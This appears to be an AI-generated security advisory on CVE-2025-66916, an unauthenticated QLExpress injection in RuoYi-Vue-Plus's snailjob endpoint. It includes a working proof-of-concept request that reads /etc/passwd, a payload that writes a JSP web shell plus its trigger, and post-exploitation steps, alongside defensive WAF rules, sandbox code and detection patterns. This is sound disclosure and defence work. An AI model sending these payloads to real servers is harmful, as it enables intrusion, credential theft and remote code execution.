CVE-2025-66916
Weakness (CWE)
CVSS Vector (v3.1): AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: Low
Description
The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier exposes the interface /snail-job/workflow/check-node-expression, which can execute QLExpress expressions but does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing.
Comprehensive Technical Analysis of CVE-2025-66916
CVE ID: CVE-2025-66916
CVSS Score: 9.4 (Critical)
Vulnerability Type: Arbitrary File Read/Write via Unsafe QLExpress Expression Evaluation
Affected Component: snailjob in RuoYi-Vue-Plus (≤ v5.5.1)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-66916 is a critical vulnerability, and a direct precursor to remote code execution (RCE), stemming from missing input validation in the /snail-job/workflow/check-node-expression endpoint of RuoYi-Vue-Plus. The endpoint evaluates attacker-supplied QLExpress expressions (QLExpress is a Java-based expression language), which gives unauthenticated callers unrestricted file system access (read and write operations) through the Java File class.
CVSS v3.1 Breakdown (Score: 9.4 - Critical)
| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network (AV:N) | Exploitable remotely without authentication. |
| Attack Complexity | Low (AC:L) | No special conditions required; straightforward exploitation. |
| Privileges Required | None (PR:N) | No prior authentication needed. |
| User Interaction | None (UI:N) | Exploitable without user interaction. |
| Scope | Unchanged (S:U) | The file access obtained stays within the security authority of the vulnerable application's host process; the published vector rates scope as unchanged. |
| Confidentiality | High (C:H) | Arbitrary file read enables sensitive data exfiltration. |
| Integrity | High (I:H) | Arbitrary file write enables persistence, malware deployment, or system compromise. |
| Availability | Low (A:L) | Overwriting configuration or startup files can degrade service, but the published vector rates availability impact as Low. |
Severity Justification
- Critical Impact: Successful exploitation grants full file system access, enabling:
  - Data exfiltration (e.g., configuration files, credentials, PII).
  - Malware deployment (e.g., web shells, ransomware, backdoors).
  - System compromise (e.g., modifying system binaries, SSH keys, or cron jobs).
- Low Barrier to Exploitation: No authentication required; payloads can be crafted with minimal effort.
- Widespread Deployment: RuoYi-Vue-Plus is a popular Java-based enterprise management framework, increasing the attack surface.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Prerequisites
- Network Access: The vulnerable endpoint (/snail-job/workflow/check-node-expression) must be reachable by the attacker.
- No Authentication: The endpoint does not enforce authentication, allowing unauthenticated exploitation.
- QLExpress Injection: Attackers must craft a payload leveraging the File class to perform file operations.
Exploitation Workflow
1. Reconnaissance:
   - Identify exposed RuoYi-Vue-Plus instances via Shodan, FOFA, or Censys (e.g., http.title:"RuoYi").
   - Confirm the vulnerability by checking the /snail-job/workflow/check-node-expression endpoint.
2. Payload Crafting:
   - Arbitrary File Read: new File("/etc/passwd").readLines() returns the contents of /etc/passwd in the response.
   - Arbitrary File Write: new File("/tmp/pwned").write("malicious content") writes arbitrary data to /tmp/pwned.
   - Remote Code Execution (RCE) via File Write: write a JSP web shell to a web-accessible directory (e.g., /var/www/html/shell.jsp):
     new File("/var/www/html/shell.jsp").write("<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>")
     and trigger it with:
     GET /shell.jsp?cmd=id HTTP/1.1
     Host: vulnerable-server
3. Post-Exploitation:
   - Lateral Movement: Exfiltrate credentials (e.g., ~/.bash_history, /etc/shadow) or database configs.
   - Persistence: Modify startup scripts (e.g., /etc/rc.local) or cron jobs.
   - Privilege Escalation: Exploit misconfigured SUID binaries or kernel vulnerabilities.
Proof-of-Concept (PoC) Example
```http
POST /snail-job/workflow/check-node-expression HTTP/1.1
Host: vulnerable-server
Content-Type: application/json

{
  "expression": "new File(\"/etc/passwd\").readLines()"
}
```
Response:
```json
{
  "result": ["root:x:0:0:root:/root:/bin/bash", "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin", ...]
}
```
3. Affected Systems & Software Versions
Vulnerable Software
- RuoYi-Vue-Plus (≤ v5.5.1)
  - A Java-based enterprise management framework widely used in Chinese and international organizations.
  - The snailjob component is a workflow engine integrated into RuoYi-Vue-Plus.
Affected Components
- Endpoint: /snail-job/workflow/check-node-expression
- Technology Stack:
  - Backend: Java (Spring Boot)
  - Scripting Engine: QLExpress (a lightweight expression evaluation engine)
  - Deployment: Typically runs on Linux/Windows servers with Java 8+.
Indicators of Compromise (IoCs)
- Network:
  - Unusual HTTP POST requests to /snail-job/workflow/check-node-expression.
  - Large responses containing file contents (e.g., /etc/passwd, /etc/shadow).
- Host-Based:
  - Unexpected files in /tmp/ or web directories (e.g., shell.jsp, backdoor.sh).
  - Modified system files (e.g., /etc/crontab, /etc/rc.local).
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade RuoYi-Vue-Plus:
  - Apply the latest patch (v5.5.2 or later) from the official repository.
  - If upgrading is not feasible, disable the snailjob component or restrict access to the endpoint.
- Network-Level Protections:
  - Firewall Rules: Block external access to /snail-job/workflow/check-node-expression.
  - WAF Rules: Deploy ModSecurity or Cloudflare WAF to block QLExpress injection attempts. The ModSecurity rule below denies every request to the endpoint, which is the safe default until the patch is applied; a rule that instead inspects the JSON body for File, Runtime or ProcessBuilder tokens additionally needs SecRequestBodyAccess On and a chained SecRule over the request body.
  - Example rule (ModSecurity):
```apache
SecRule REQUEST_FILENAME "@streq /snail-job/workflow/check-node-expression" \
    "id:1000,\
    phase:2,\
    t:none,\
    block,\
    msg:'CVE-2025-66916: request to unpatched check-node-expression endpoint blocked',\
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    tag:'CVE-2025-66916'"
```
- Input Validation & Sanitization:
  - Whitelist Allowed Expressions: Restrict QLExpress to a predefined set of safe operations.
  - Disable Dangerous Classes: Explicitly block File, Runtime, ProcessBuilder, and other high-risk classes. In QLExpress this is a runner-strategy setting rather than a per-class function registration (the complete runner is shown in section 6):
```java
QLExpressRunStrategy.setSandBoxMode(true);                     // expressions may not reference Java classes
QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true); // also refuse the engine's risky-method list
ExpressRunner runner = new ExpressRunner();
```
- Least Privilege Principle:
  - Run the RuoYi-Vue-Plus service as a low-privilege user (e.g., ruoyi instead of root).
  - Restrict file system permissions on what that user can read and write (e.g., chmod 600 on configuration files that hold credentials). /etc/passwd itself must remain world-readable for the system to function, so harden the application's own files and secrets rather than system account files.
Long-Term Recommendations
- Security Hardening:
  - Java Security Manager: Enable the Java Security Manager to restrict file system access (deprecated for removal since JDK 17, so treat it as a stop-gap on older runtimes).
  - Containerization: Deploy RuoYi-Vue-Plus in a Docker container with read-only filesystems where possible.
- Monitoring & Detection:
  - SIEM Integration: Monitor for suspicious QLExpress payloads (e.g., File, Runtime).
  - File Integrity Monitoring (FIM): Use Tripwire or AIDE to detect unauthorized file modifications.
- Vendor Coordination:
  - Subscribe to RuoYi-Vue-Plus security advisories for future patches.
  - Report any zero-day vulnerabilities to CERT or CNVD (China National Vulnerability Database).
5. Impact on the Cybersecurity Landscape
Enterprise Risk
- Supply Chain Threat: RuoYi-Vue-Plus is embedded in enterprise ERP, CRM, and workflow systems, making this a high-value target for APT groups and ransomware operators.
- Data Breach Potential: Unauthorized file read/write can lead to PII leaks, financial fraud, or regulatory fines (e.g., GDPR, CCPA).
Exploitation Trends
- Mass Scanning: Expect automated exploit scripts (e.g., Nuclei templates) within 48 hours of public disclosure.
- Ransomware & Cryptojacking: Attackers may deploy XMRig miners or LockBit ransomware via file write primitives.
- APT Activity: State-sponsored groups (e.g., APT41, Lazarus) may leverage this for espionage or sabotage.
Industry Response
- CISA KEV Inclusion: Likely to be added to the CISA Known Exploited Vulnerabilities (KEV) catalog, mandating federal patching.
- Threat Intelligence Sharing: Organizations should monitor MISP, AlienVault OTX, and Anomali for IoCs.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path: The /snail-job/workflow/check-node-expression endpoint directly evaluates user-supplied QLExpress expressions without:
  - Input sanitization (e.g., regex filtering for File, Runtime).
  - Sandboxing (e.g., Java Security Manager restrictions).
  - Whitelisting (e.g., allowing only arithmetic/logical operations).
- QLExpress Misconfiguration: QLExpress is designed for business rule evaluation but lacks secure defaults. Unless sandbox mode is enabled, expressions may reference Java classes directly, so the File class is implicitly available and file operations are reachable from any expression.
Exploit Chaining Potential
- File Read → Credential Theft: Exfiltrate /etc/passwd, /etc/shadow, or database configs (e.g., application.properties).
- File Write → RCE: Write a JSP web shell to a web directory (e.g., /var/www/html/).
- RCE → Lateral Movement: Use stolen credentials to SSH into other hosts or dump database contents.
Detection & Forensics
- Log Analysis:
  - Search for QLExpress payloads in HTTP request logs. The default nginx access log records only the request line, not POST bodies, so this finds anything only where bodies are logged (a custom log_format, or a reverse proxy/WAF that captures request bodies):
```bash
grep -r "new File(" /var/log/nginx/access.log
```
  - Check for files modified in the last 24 hours:
```bash
find / -type f -mtime -1 -exec ls -la {} \; 2>/dev/null
```
- Memory Forensics:
  - Use Volatility or Rekall to enumerate Java processes from a memory image as a starting point (the process list alone does not show which expressions were evaluated; the matching process memory has to be inspected next):
```bash
volatility -f memory.dump linux_pslist | grep "java"
```
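As an added example (not part of the original analysis and not RuoYi-Vue-Plus or snailjob code), the following Python implements both the expression allow-list from section 4 and the log-side detection described here: is_safe_expression is an application-side gate that admits only arithmetic/comparison/boolean expressions over named variables, and scan_request_log flags requests to the endpoint whose body references the File class or its usual follow-ons. The JSON-lines log format and the three records are constructed for the example; a real deployment needs a proxy or application log that records request bodies.

```python
import json
import re

ENDPOINT = "/snail-job/workflow/check-node-expression"

# Application-side allow-list: numbers, boolean literals, allow-listed variable
# names and arithmetic/comparison/boolean operators only.  Quotes, dots, commas,
# 'new', class names and method names are rejected before reaching QLExpress.
_TOKEN = re.compile(
    r"\s+|(?P<num>\d+(?:\.\d+)?)|(?P<ident>[A-Za-z_]\w*)"
    r"|(?P<op><=|>=|==|!=|&&|\|\||[-+*/%()<>!])|(?P<bad>.)"
)
_LITERALS = {"true", "false", "null"}

def is_safe_expression(expr, allowed_vars):
    """True only if expr is non-empty and every token is on the allow-list."""
    for m in _TOKEN.finditer(expr):
        ident = m.group("ident")
        if m.group("bad") is not None or (ident and ident not in _LITERALS | set(allowed_vars)):
            return False
    return bool(expr.strip())

# SIEM-side detection: 'new File' is the primitive this CVE abuses; the other
# tokens are common follow-ons and have no place in a workflow node expression.
_RISK = re.compile(r"\b(?:new\s+(?:java\.io\.)?File|Runtime|ProcessBuilder|Class\.forName|import\s+java)\b")

def scan_request_log(lines):
    """Return (src, matched_token) for each request to ENDPOINT whose JSON body
    carries a risky expression.  Lines are JSON records with 'src', 'path' and
    the raw request 'body' (a constructed log format for this example)."""
    alerts = []
    for line in lines:
        try:
            rec = json.loads(line)
            expr = json.loads(rec.get("body") or "{}").get("expression", "")
        except (ValueError, AttributeError):
            continue
        if rec.get("path") != ENDPOINT:
            continue
        hit = _RISK.search(str(expr))
        if hit is not None:
            alerts.append((rec.get("src"), hit.group(0)))
    return alerts

# Constructed sample records (not real traffic): a benign check, the exploit
# payload quoted in this advisory, and an unrelated request.
SAMPLE_LOG = [json.dumps({"src": s, "path": p, "body": json.dumps({"expression": e})}) for s, p, e in [
    ("10.0.0.5", ENDPOINT, "a + b > 3"),
    ("198.51.100.7", ENDPOINT, 'new File("/etc/passwd").readLines()'),
    ("10.0.0.9", "/snail-job/workflow/list", "1 + 1"),
]]
```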
Advanced Mitigation: Custom QLExpress Sandbox
For organizations unable to upgrade, implement a custom QLExpress sandbox. The engine's own sandbox switch lives in QLExpressRunStrategy; there is no per-class "disable" method on ExpressRunner, so the class names cannot simply be registered as null functions:
```java
import com.ql.util.express.DefaultContext;
import com.ql.util.express.ExpressRunner;
import com.ql.util.express.IExpressContext;
import com.ql.util.express.config.QLExpressRunStrategy;

public class SafeQLExpressRunner {
    public static void main(String[] args) throws Exception {
        // Sandbox mode (QLExpressRunStrategy, current QLExpress 3.x): expressions
        // may not import or reference Java classes, so new File(...), Runtime and
        // ProcessBuilder are unreachable; only functions registered on the runner
        // and explicitly white-listed methods remain callable.
        QLExpressRunStrategy.setSandBoxMode(true);
        // Defence in depth: also refuse the engine's built-in list of risky
        // methods (System.exit, Runtime.exec, ...) should sandbox mode be disabled.
        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);

        ExpressRunner runner = new ExpressRunner();
        // Whitelist safe operations: expose Math.addExact to expressions as add(a, b)
        runner.addFunctionOfClassMethod("add", Math.class.getName(), "addExact",
                new String[]{"long", "long"}, null);

        // Execute in a restricted context
        IExpressContext<String, Object> context = new DefaultContext<>();
        Object result = runner.execute("1 + 1", context, null, false, false);
        System.out.println(result); // Output: 2
    }
}
```
Conclusion
CVE-2025-66916 represents a critical security flaw with severe real-world impact, enabling unauthenticated attackers to achieve arbitrary file read/write and potential RCE. Organizations using RuoYi-Vue-Plus must prioritize patching and implement defensive measures (WAF rules, input validation, least privilege) to mitigate risk.
Key Takeaways for Security Teams:
- Patch Immediately: Upgrade to RuoYi-Vue-Plus v5.5.2+.
- Monitor for Exploitation: Deploy SIEM rules to detect QLExpress injection attempts.
- Harden Deployments: Restrict file system access and disable dangerous QLExpress classes.
- Prepare for Post-Exploitation: Assume breach and hunt for IoCs (unexpected files, modified configs).
For further details, refer to the PoC gist and RuoYi-Vue-Plus repository.